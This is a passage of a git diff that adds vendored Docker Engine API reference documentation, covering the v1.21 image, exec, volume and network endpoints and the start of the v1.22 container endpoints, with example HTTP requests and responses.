+image (and its parents) are returned, but with the exclusion of the
+'repositories' file in the tarball, as there were no image names referenced.
+
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    GET /v1.21/images/ubuntu/get
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    Binary data stream
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Get a tarball containing all images
+
+`GET /images/get`
+
+Get a tarball containing all images and metadata for one or more repositories.
+
+For each value of the `names` parameter: if it is a specific name and tag (e.g.
+`ubuntu:latest`), then only that image (and its parents) are returned; if it is
+an image ID, similarly only that image (and its parents) are returned and there
+would be no names referenced in the 'repositories' file for this image ID.
+
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    GET /v1.21/images/get?names=myname%2Fmyapp%3Alatest&names=busybox
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    Binary data stream
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Load a tarball with a set of images and tags into docker
+
+`POST /images/load`
+
+Load a set of images and tags into a Docker repository.
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    POST /v1.21/images/load
+    Content-Type: application/x-tar
+
+    Tarball in body
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Image tarball format
+
+An image tarball contains one directory per image layer (named using its long ID),
+each containing these files:
+
+- `VERSION`: currently `1.0` - the file format version
+- `json`: detailed layer information, similar to `docker inspect layer_id`
+- `layer.tar`: A tarfile containing the filesystem changes in this layer
+
+The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories
+for storing attribute changes and deletions.
+
+If the tarball defines a repository, the tarball should also include a `repositories` file at
+the root that contains a list of repository and tag names mapped to layer IDs.
+
+```
+{"hello-world":
+    {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"}
+}
+```
+
+#### Exec Create
+
+`POST /containers/(id or name)/exec`
+
+Sets up an exec instance in a running container `id`
+
+**Example request**:
+
+    POST /v1.21/containers/e90e34656806/exec HTTP/1.1
+    Content-Type: application/json
+
+    {
+      "AttachStdin": true,
+      "AttachStdout": true,
+      "AttachStderr": true,
+      "Cmd": ["sh"],
+      "Privileged": true,
+      "Tty": true,
+      "User": "123:456"
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {
+         "Id": "f90e34656806",
+         "Warnings":[]
+    }
+
+**JSON parameters**:
+
+-   **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command.
+-   **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command.
+-   **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command.
+-   **Tty** - Boolean value to allocate a pseudo-TTY.
+-   **Cmd** - Command to run specified as a string or an array of strings.
+-   **Privileged** - Boolean value, runs the exec process with extended privileges.
+-   **User** - A string value specifying the user, and optionally, group to run
+        the exec process inside the container. Format is one of: `"user"`,
+        `"user:group"`, `"uid"`, or `"uid:gid"`.
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such container
+-   **409** - container is paused
+-   **500** - server error
+
+#### Exec Start
+
+`POST /exec/(id)/start`
+
+Starts a previously set up `exec` instance `id`. If `detach` is true, this API
+returns after starting the `exec` command. Otherwise, this API sets up an
+interactive session with the `exec` command.
+
+**Example request**:
+
+    POST /v1.21/exec/e90e34656806/start HTTP/1.1
+    Content-Type: application/json
+
+    {
+     "Detach": false,
+     "Tty": false
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/vnd.docker.raw-stream
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**JSON parameters**:
+
+-   **Detach** - Detach from the `exec` command.
+-   **Tty** - Boolean value to allocate a pseudo-TTY.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such exec instance
+-   **409** - container is paused
+
+**Stream details**:
+
+Similar to the stream behavior of `POST /containers/(id or name)/attach` API
+
+#### Exec Resize
+
+`POST /exec/(id)/resize`
+
+Resizes the `tty` session used by the `exec` command `id`.  The unit is number of characters.
+This API is valid only if `tty` was specified as part of creating and starting the `exec` command.
+
+**Example request**:
+
+    POST /v1.21/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1
+    Content-Type: text/plain
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: text/plain
+
+**Query parameters**:
+
+-   **h** – height of `tty` session
+-   **w** – width
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such exec instance
+
+#### Exec Inspect
+
+`GET /exec/(id)/json`
+
+Return low-level information about the `exec` command `id`.
+
+**Example request**:
+
+    GET /v1.21/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: plain/text
+
+    {
+      "ID" : "11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39",
+      "Running" : false,
+      "ExitCode" : 2,
+      "ProcessConfig" : {
+        "privileged" : false,
+        "user" : "",
+        "tty" : false,
+        "entrypoint" : "sh",
+        "arguments" : [
+          "-c",
+          "exit 2"
+        ]
+      },
+      "OpenStdin" : false,
+      "OpenStderr" : false,
+      "OpenStdout" : false,
+      "Container" : {
+        "State" : {
+          "Status" : "running",
+          "Running" : true,
+          "Paused" : false,
+          "Restarting" : false,
+          "OOMKilled" : false,
+          "Pid" : 3650,
+          "ExitCode" : 0,
+          "Error" : "",
+          "StartedAt" : "2014-11-17T22:26:03.717657531Z",
+          "FinishedAt" : "0001-01-01T00:00:00Z"
+        },
+        "ID" : "8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c",
+        "Created" : "2014-11-17T22:26:03.626304998Z",
+        "Path" : "date",
+        "Args" : [],
+        "Config" : {
+          "Hostname" : "8f177a186b97",
+          "Domainname" : "",
+          "User" : "",
+          "AttachStdin" : false,
+          "AttachStdout" : false,
+          "AttachStderr" : false,
+          "ExposedPorts" : null,
+          "Tty" : false,
+          "OpenStdin" : false,
+          "StdinOnce" : false,
+          "Env" : [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ],
+          "Cmd" : [
+            "date"
+          ],
+          "Image" : "ubuntu",
+          "Volumes" : null,
+          "WorkingDir" : "",
+          "Entrypoint" : null,
+          "NetworkDisabled" : false,
+          "MacAddress" : "",
+          "OnBuild" : null,
+          "SecurityOpt" : null
+        },
+        "Image" : "5506de2b643be1e6febbf3b8a240760c6843244c41e12aa2f60ccbb7153d17f5",
+        "NetworkSettings" : {
+          "Bridge": "",
+          "SandboxID": "",
+          "HairpinMode": false,
+          "LinkLocalIPv6Address": "",
+          "LinkLocalIPv6PrefixLen": 0,
+          "Ports": null,
+          "SandboxKey": "",
+          "SecondaryIPAddresses": null,
+          "SecondaryIPv6Addresses": null,
+          "EndpointID": "",
+          "Gateway": "",
+          "GlobalIPv6Address": "",
+          "GlobalIPv6PrefixLen": 0,
+          "IPAddress": "",
+          "IPPrefixLen": 0,
+          "IPv6Gateway": "",
+          "MacAddress": "",
+          "Networks": {
+            "bridge": {
+              "EndpointID": "",
+              "Gateway": "",
+              "IPAddress": "",
+              "IPPrefixLen": 0,
+              "IPv6Gateway": "",
+              "GlobalIPv6Address": "",
+              "GlobalIPv6PrefixLen": 0,
+              "MacAddress": ""
+            }
+          }
+        },
+        "ResolvConfPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/resolv.conf",
+        "HostnamePath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hostname",
+        "HostsPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hosts",
+        "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log",
+        "Name" : "/test",
+        "Driver" : "aufs",
+        "ExecDriver" : "native-0.2",
+        "MountLabel" : "",
+        "ProcessLabel" : "",
+        "AppArmorProfile" : "",
+        "RestartCount" : 0,
+        "Mounts" : []
+      }
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such exec instance
+-   **500** - server error
+
+### 2.4 Volumes
+
+#### List volumes
+
+`GET /volumes`
+
+**Example request**:
+
+    GET /v1.21/volumes HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "Volumes": [
+        {
+          "Name": "tardis",
+          "Driver": "local",
+          "Mountpoint": "/var/lib/docker/volumes/tardis"
+        }
+      ]
+    }
+
+**Query parameters**:
+
+- **filters** - JSON encoded value of the filters (a `map[string][]string`) to process on the volumes list. There is one available filter: `dangling=true`
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - server error
+
+#### Create a volume
+
+`POST /volumes/create`
+
+Create a volume
+
+**Example request**:
+
+    POST /v1.21/volumes/create HTTP/1.1
+    Content-Type: application/json
+
+    {
+      "Name": "tardis"
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {
+      "Name": "tardis",
+      "Driver": "local",
+      "Mountpoint": "/var/lib/docker/volumes/tardis"
+    }
+
+**Status codes**:
+
+- **201** - no error
+- **500**  - server error
+
+**JSON parameters**:
+
+- **Name** - The new volume's name. If not specified, Docker generates a name.
+- **Driver** - Name of the volume driver to use. Defaults to `local` for the name.
+- **DriverOpts** - A mapping of driver options and values. These options are
+    passed directly to the driver and are driver specific.
+
+#### Inspect a volume
+
+`GET /volumes/(name)`
+
+Return low-level information on the volume `name`
+
+**Example request**:
+
+    GET /volumes/tardis
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "Name": "tardis",
+      "Driver": "local",
+      "Mountpoint": "/var/lib/docker/volumes/tardis"
+    }
+
+**Status codes**:
+
+-   **200** - no error
+-   **404** - no such volume
+-   **500** - server error
+
+#### Remove a volume
+
+`DELETE /volumes/(name)`
+
+Instruct the driver to remove the volume (`name`).
+
+**Example request**:
+
+    DELETE /v1.21/volumes/tardis HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** - no error
+-   **404** - no such volume or volume driver
+-   **409** - volume is in use and cannot be removed
+-   **500** - server error
+
+### 2.5 Networks
+
+#### List networks
+
+`GET /networks`
+
+**Example request**:
+
+    GET /v1.21/networks HTTP/1.1
+
+**Example response**:
+
+```
+HTTP/1.1 200 OK
+Content-Type: application/json
+
+[
+  {
+    "Name": "bridge",
+    "Id": "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566",
+    "Scope": "local",
+    "Driver": "bridge",
+    "IPAM": {
+      "Driver": "default",
+      "Config": [
+        {
+          "Subnet": "172.17.0.0/16"
+        }
+      ]
+    },
+    "Containers": {
+      "39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867": {
+        "EndpointID": "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda",
+        "MacAddress": "02:42:ac:11:00:02",
+        "IPv4Address": "172.17.0.2/16",
+        "IPv6Address": ""
+      }
+    },
+    "Options": {
+      "com.docker.network.bridge.default_bridge": "true",
+      "com.docker.network.bridge.enable_icc": "true",
+      "com.docker.network.bridge.enable_ip_masquerade": "true",
+      "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
+      "com.docker.network.bridge.name": "docker0",
+      "com.docker.network.driver.mtu": "1500"
+    }
+  },
+  {
+    "Name": "none",
+    "Id": "e086a3893b05ab69242d3c44e49483a3bbbd3a26b46baa8f61ab797c1088d794",
+    "Scope": "local",
+    "Driver": "null",
+    "IPAM": {
+      "Driver": "default",
+      "Config": []
+    },
+    "Containers": {},
+    "Options": {}
+  },
+  {
+    "Name": "host",
+    "Id": "13e871235c677f196c4e1ecebb9dc733b9b2d2ab589e30c539efeda84a24215e",
+    "Scope": "local",
+    "Driver": "host",
+    "IPAM": {
+      "Driver": "default",
+      "Config": []
+    },
+    "Containers": {},
+    "Options": {}
+  }
+]
+```
+
+**Query parameters**:
+
+- **filters** - JSON encoded value of the filters (a `map[string][]string`) to process on the networks list. Available filters: `name=[network-names]` , `id=[network-ids]`
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - server error
+
+#### Inspect network
+
+`GET /networks/<network-id>`
+
+**Example request**:
+
+    GET /v1.21/networks/f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566 HTTP/1.1
+
+**Example response**:
+
+```
+HTTP/1.1 200 OK
+Content-Type: application/json
+
+{
+  "Name": "bridge",
+  "Id": "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566",
+  "Scope": "local",
+  "Driver": "bridge",
+  "IPAM": {
+    "Driver": "default",
+    "Config": [
+      {
+        "Subnet": "172.17.0.0/16"
+      }
+    ]
+  },
+  "Containers": {
+    "39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867": {
+      "EndpointID": "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda",
+      "MacAddress": "02:42:ac:11:00:02",
+      "IPv4Address": "172.17.0.2/16",
+      "IPv6Address": ""
+    }
+  },
+  "Options": {
+    "com.docker.network.bridge.default_bridge": "true",
+    "com.docker.network.bridge.enable_icc": "true",
+    "com.docker.network.bridge.enable_ip_masquerade": "true",
+    "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
+    "com.docker.network.bridge.name": "docker0",
+    "com.docker.network.driver.mtu": "1500"
+  }
+}
+```
+
+**Status codes**:
+
+-   **200** - no error
+-   **404** - network not found
+
+#### Create a network
+
+`POST /networks/create`
+
+Create a network
+
+**Example request**:
+
+```
+POST /v1.21/networks/create HTTP/1.1
+Content-Type: application/json
+
+{
+  "Name":"isolated_nw",
+  "CheckDuplicate":true,
+  "Driver":"bridge",
+  "IPAM":{
+    "Driver": "default",
+    "Config":[
+      {
+        "Subnet":"172.20.0.0/16",
+        "IPRange":"172.20.10.0/24",
+        "Gateway":"172.20.10.11"
+      }
+    ]
+  }
+}
+```
+
+**Example response**:
+
+```
+HTTP/1.1 201 Created
+Content-Type: application/json
+
+{
+  "Id": "22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30",
+  "Warning": ""
+}
+```
+
+**Status codes**:
+
+- **201** - no error
+- **404** - plugin not found
+- **500** - server error
+
+**JSON parameters**:
+
+- **Name** - The new network's name. this is a mandatory field
+- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false`
+- **Driver** - Name of the network driver plugin to use. Defaults to `bridge` driver
+- **IPAM** - Optional custom IP scheme for the network
+  - **Driver** - Name of the IPAM driver to use. Defaults to `default` driver
+  - **Config** - List of IPAM configuration options, specified as a map:
+      `{"Subnet": <CIDR>, "IPRange": <CIDR>, "Gateway": <IP address>, "AuxAddress": <device_name:IP address>}`
+- **Options** - Network specific options to be used by the drivers
+
+#### Connect a container to a network
+
+`POST /networks/(id)/connect`
+
+Connect a container to a network
+
+**Example request**:
+
+```
+POST /v1.21/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/connect HTTP/1.1
+Content-Type: application/json
+
+{
+  "Container":"3613f73ba0e4"
+}
+```
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+- **200** - no error
+- **404** - network or container is not found
+- **500** - Internal Server Error
+
+**JSON parameters**:
+
+- **container** - container-id/name to be connected to the network
+
+#### Disconnect a container from a network
+
+`POST /networks/(id)/disconnect`
+
+Disconnect a container from a network
+
+**Example request**:
+
+```
+POST /v1.21/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/disconnect HTTP/1.1
+Content-Type: application/json
+
+{
+  "Container":"3613f73ba0e4"
+}
+```
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+- **200** - no error
+- **404** - network or container not found
+- **500** - Internal Server Error
+
+**JSON parameters**:
+
+- **Container** - container-id/name to be disconnected from a network
+
+#### Remove a network
+
+`DELETE /networks/(id)`
+
+Instruct the driver to remove the network (`id`).
+
+**Example request**:
+
+    DELETE /v1.21/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+-   **200** - no error
+-   **404** - no such network
+-   **500** - server error
+
+## 3. Going further
+
+### 3.1 Inside `docker run`
+
+As an example, the `docker run` command line makes the following API calls:
+
+- Create the container
+
+- If the status code is 404, it means the image doesn't exist:
+    - Try to pull it.
+    - Then, retry to create the container.
+
+- Start the container.
+
+- If you are not in detached mode:
+- Attach to the container, using `logs=1` (to have `stdout` and
+      `stderr` from the container's start) and `stream=1`
+
+- If in detached mode or only `stdin` is attached, display the container's id.
+
+### 3.2 Hijacking
+
+In this version of the API, `/attach`, uses hijacking to transport `stdin`,
+`stdout`, and `stderr` on the same socket.
+
+To hint potential proxies about connection hijacking, Docker client sends
+connection upgrade headers similarly to websocket.
+
+    Upgrade: tcp
+    Connection: Upgrade
+
+When Docker daemon detects the `Upgrade` header, it switches its status code
+from **200 OK** to **101 UPGRADED** and resends the same headers.
+
+
+### 3.3 CORS Requests
+
+To set cross origin requests to the Engine API please give values to
+`--api-cors-header` when running Docker in daemon mode. Set * (asterisk) allows all,
+default or blank means CORS disabled
+
+    $ dockerd -H="192.168.1.9:2375" --api-cors-header="http://foo.bar"
diff --git a/vendor/github.com/docker/docker/docs/api/v1.22.md b/vendor/github.com/docker/docker/docs/api/v1.22.md
new file mode 100644
index 0000000000..e94081344c
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/api/v1.22.md
@@ -0,0 +1,3307 @@
+---
+title: "Engine API v1.22"
+description: "API Documentation for Docker"
+keywords: "API, Docker, rcli, REST, documentation"
+redirect_from:
+- /engine/reference/api/docker_remote_api_v1.22/
+- /reference/api/docker_remote_api_v1.22/
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+## 1. Brief introduction
+
+ - The daemon listens on `unix:///var/run/docker.sock` but you can
+   [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket).
+ - The API tends to be REST. However, for some complex commands, like `attach`
+   or `pull`, the HTTP connection is hijacked to transport `stdout`,
+   `stdin` and `stderr`.
+
+## 2. Endpoints
+
+### 2.1 Containers
+
+#### List containers
+
+`GET /containers/json`
+
+List containers
+
+**Example request**:
+
+    GET /v1.22/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+         {
+                 "Id": "8dfafdbc3a40",
+                 "Names":["/boring_feynman"],
+                 "Image": "ubuntu:latest",
+                 "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
+                 "Command": "echo 1",
+                 "Created": 1367854155,
+                 "Status": "Exit 0",
+                 "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}],
+                 "Labels": {
+                         "com.example.vendor": "Acme",
+                         "com.example.license": "GPL",
+                         "com.example.version": "1.0"
+                 },
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0,
+                 "HostConfig": {
+                         "NetworkMode": "default"
+                 },
+                 "NetworkSettings": {
+                         "Networks": {
+                                 "bridge": {
+                                          "IPAMConfig": null,
+                                          "Links": null,
+                                          "Aliases": null,
+                                          "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
+                                          "EndpointID": "2cdc4edb1ded3631c81f57966563e5c8525b81121bb3706a9a9a3ae102711f3f",
+                                          "Gateway": "172.17.0.1",
+                                          "IPAddress": "172.17.0.2",
+                                          "IPPrefixLen": 16,
+                                          "IPv6Gateway": "",
+                                          "GlobalIPv6Address": "",
+                                          "GlobalIPv6PrefixLen": 0,
+                                          "MacAddress": "02:42:ac:11:00:02"
+                                  }
+                         }
+                 }
+         },
+         {
+                 "Id": "9cd87474be90",
+                 "Names":["/coolName"],
+                 "Image": "ubuntu:latest",
+                 "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
+                 "Command": "echo 222222",
+                 "Created": 1367854155,
+                 "Status": "Exit 0",
+                 "Ports": [],
+                 "Labels": {},
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0,
+                 "HostConfig": {
+                         "NetworkMode": "default"
+                 },
+                 "NetworkSettings": {
+                         "Networks": {
+                                 "bridge": {
+                                          "IPAMConfig": null,
+                                          "Links": null,
+                                          "Aliases": null,
+                                          "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
+                                          "EndpointID": "88eaed7b37b38c2a3f0c4bc796494fdf51b270c2d22656412a2ca5d559a64d7a",
+                                          "Gateway": "172.17.0.1",
+                                          "IPAddress": "172.17.0.8",
+                                          "IPPrefixLen": 16,
+                                          "IPv6Gateway": "",
+                                          "GlobalIPv6Address": "",
+                                          "GlobalIPv6PrefixLen": 0,
+                                          "MacAddress": "02:42:ac:11:00:08"
+                                  }
+                         }
+                 }
+         },
+         {
+                 "Id": "3176a2479c92",
+                 "Names":["/sleepy_dog"],
+                 "Image": "ubuntu:latest",
+                 "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
+                 "Command": "echo 3333333333333333",
+                 "Created": 1367854154,
+                 "Status": "Exit 0",
+                 "Ports":[],
+                 "Labels": {},
+                 "SizeRw":12288,
+                 "SizeRootFs":0,
+                 "HostConfig": {
+                         "NetworkMode": "default"
+                 },
+                 "NetworkSettings": {
+                         "Networks": {
+                                 "bridge": {
+                                          "IPAMConfig": null,
+                                          "Links": null,
+                                          "Aliases": null,
+                                          "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
+                                          "EndpointID": "8b27c041c30326d59cd6e6f510d4f8d1d570a228466f956edf7815508f78e30d",
+                                          "Gateway": "172.17.0.1",
+                                          "IPAddress": "172.17.0.6",
+                                          "IPPrefixLen": 16,
+                                          "IPv6Gateway": "",
+                                          "GlobalIPv6Address": "",
+                                          "GlobalIPv6PrefixLen": 0,
+                                          "MacAddress": "02:42:ac:11:00:06"
+                                  }
+                         }
+                 }
+         },
+         {
+                 "Id": "4cb07b47f9fb",
+                 "Names":["/running_cat"],
+                 "Image": "ubuntu:latest",
+                 "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
+                 "Command": "echo 444444444444444444444444444444444",
+                 "Created": 1367854152,
+                 "Status": "Exit 0",
+                 "Ports": [],
+                 "Labels": {},
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0,
+                 "HostConfig": {
+                         "NetworkMode": "default"
+                 },
+                 "NetworkSettings": {
+                         "Networks": {
+                                 "bridge": {
+                                          "IPAMConfig": null,
+                                          "Links": null,
+                                          "Aliases": null,
+                                          "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
+                                          "EndpointID": "d91c7b2f0644403d7ef3095985ea0e2370325cd2332ff3a3225c4247328e66e9",
+                                          "Gateway": "172.17.0.1",
+                                          "IPAddress": "172.17.0.5",
+                                          "IPPrefixLen": 16,
+                                          "IPv6Gateway": "",
+                                          "GlobalIPv6Address": "",
+                                          "GlobalIPv6PrefixLen": 0,
+                                          "MacAddress": "02:42:ac:11:00:05"
+                                  }
+                         }
+                 }
+         }
+    ]
+
+**Query parameters**:
+
+-   **all** – 1/True/true or 0/False/false, Show all containers.
+        Only running containers are shown by default (i.e., this defaults to false)
+-   **limit** – Show `limit` last created
+        containers, include non-running ones.
+-   **since** – Show only containers created since Id, include
+        non-running ones.
+-   **before** – Show only containers created before Id, include
+        non-running ones.
+-   **size** – 1/True/true or 0/False/false, Show the containers
+        sizes
+-   **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters:
+  -   `exited=<int>`; -- containers with exit code of  `<int>` ;
+  -   `status=`(`created`|`restarting`|`running`|`paused`|`exited`|`dead`)
+  -   `label=key` or `label="key=value"` of a container label
+  -   `isolation=`(`default`|`process`|`hyperv`)   (Windows daemon only)
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **500** – server error
+
+#### Create a container
+
+`POST /containers/create`
+
+Create a container
+
+**Example request**:
+
+    POST /v1.22/containers/create HTTP/1.1
+    Content-Type: application/json
+
+    {
+           "Hostname": "",
+           "Domainname": "",
+           "User": "",
+           "AttachStdin": false,
+           "AttachStdout": true,
+           "AttachStderr": true,
+           "Tty": false,
+           "OpenStdin": false,
+           "StdinOnce": false,
+           "Env": [
+                   "FOO=bar",
+                   "BAZ=quux"
+           ],
+           "Cmd": [
+                   "date"
+           ],
+           "Entrypoint": null,
+           "Image": "ubuntu",
+           "Labels": {
+                   "com.example.vendor": "Acme",
+                   "com.example.license": "GPL",
+                   "com.example.version": "1.0"
+           },
+           "Volumes": {
+             "/volumes/data": {}
+           },
+           "WorkingDir": "",
+           "NetworkDisabled": false,
+           "MacAddress": "12:34:56:78:9a:bc",
+           "ExposedPorts": {
+                   "22/tcp": {}
+           },
+           "StopSignal": "SIGTERM",
+           "HostConfig": {
+             "Binds": ["/tmp:/tmp"],
+             "Tmpfs": { "/run": "rw,noexec,nosuid,size=65536k" },
+             "Links": ["redis3:redis"],
+             "Memory": 0,
+             "MemorySwap": 0,
+             "MemoryReservation": 0,
+             "KernelMemory": 0,
+             "CpuShares": 512,
+             "CpuPeriod": 100000,
+             "CpuQuota": 50000,
+             "CpusetCpus": "0,1",
+             "CpusetMems": "0,1",
+             "BlkioWeight": 300,
+             "BlkioWeightDevice": [{}],
+             "BlkioDeviceReadBps": [{}],
+             "BlkioDeviceReadIOps": [{}],
+             "BlkioDeviceWriteBps": [{}],
+             "BlkioDeviceWriteIOps": [{}],
+             "MemorySwappiness": 60,
+             "OomKillDisable": false,
+             "OomScoreAdj": 500,
+             "PidMode": "",
+             "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] },
+             "PublishAllPorts": false,
+             "Privileged": false,
+             "ReadonlyRootfs": false,
+             "Dns": ["8.8.8.8"],
+             "DnsOptions": [""],
+             "DnsSearch": [""],
+             "ExtraHosts": null,
+             "VolumesFrom": ["parent", "other:ro"],
+             "CapAdd": ["NET_ADMIN"],
+             "CapDrop": ["MKNOD"],
+             "GroupAdd": ["newgroup"],
+             "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 },
+             "NetworkMode": "bridge",
+             "Devices": [],
+             "Ulimits": [{}],
+             "LogConfig": { "Type": "json-file", "Config": {} },
+             "SecurityOpt": [],
+             "CgroupParent": "",
+             "VolumeDriver": "",
+             "ShmSize": 67108864
+          },
+          "NetworkingConfig": {
+              "EndpointsConfig": {
+                  "isolated_nw" : {
+                      "IPAMConfig": {
+                          "IPv4Address":"172.20.30.33",
+                          "IPv6Address":"2001:db8:abcd::3033"
+                      },
+                      "Links":["container_1", "container_2"],
+                      "Aliases":["server_x", "server_y"]
+                  }
+              }
+          }
+      }
+
+**Example response**:
+
+      HTTP/1.1 201 Created
+      Content-Type: application/json
+
+      {
+           "Id":"e90e34656806",
+           "Warnings":[]
+      }
+
+**JSON parameters**:
+
+-   **Hostname** - A string value containing the hostname to use for the
+      container.
+-   **Domainname** - A string value containing the domain name to use
+      for the container.
+-   **User** - A string value specifying the user inside the container.
+-   **AttachStdin** - Boolean value, attaches to `stdin`.
+-   **AttachStdout** - Boolean value, attaches to `stdout`.
+-   **AttachStderr** - Boolean value, attaches to `stderr`.
+-   **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed.
+-   **OpenStdin** - Boolean value, opens `stdin`,
+-   **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects.
+-   **Env** - A list of environment variables in the form of `["VAR=value", ...]`
+-   **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }`
+-   **Cmd** - Command to run specified as a string or an array of strings.
+-   **Entrypoint** - Set the entry point for the container as a string or an array
+      of strings.
+-   **Image** - A string specifying the image name to use for the container.
+-   **Volumes** - An object mapping mount point paths (strings) inside the
+      container to empty objects.
+-   **WorkingDir** - A string specifying the working directory for commands to
+      run in.
+-   **NetworkDisabled** - Boolean value, when true disables networking for the
+      container
+-   **ExposedPorts** - An object mapping ports to an empty object in the form of:
+      `"ExposedPorts": { "<port>/<tcp|udp>: {}" }`
+-   **StopSignal** - Signal to stop a container as a string or unsigned integer. `SIGTERM` by default.
+-   **HostConfig**
+    -   **Binds** – A list of volume bindings for this container. Each volume binding is a string in one of these forms:
+           + `host-src:container-dest` to bind-mount a host path into the
+             container. Both `host-src`, and `container-dest` must be an
+             _absolute_ path.
+           + `host-src:container-dest:ro` to make the bind-mount read-only
+             inside the container. Both `host-src`, and `container-dest` must be
+             an _absolute_ path.
+           + `volume-name:container-dest` to bind-mount a volume managed by a
+             volume driver into the container. `container-dest` must be an
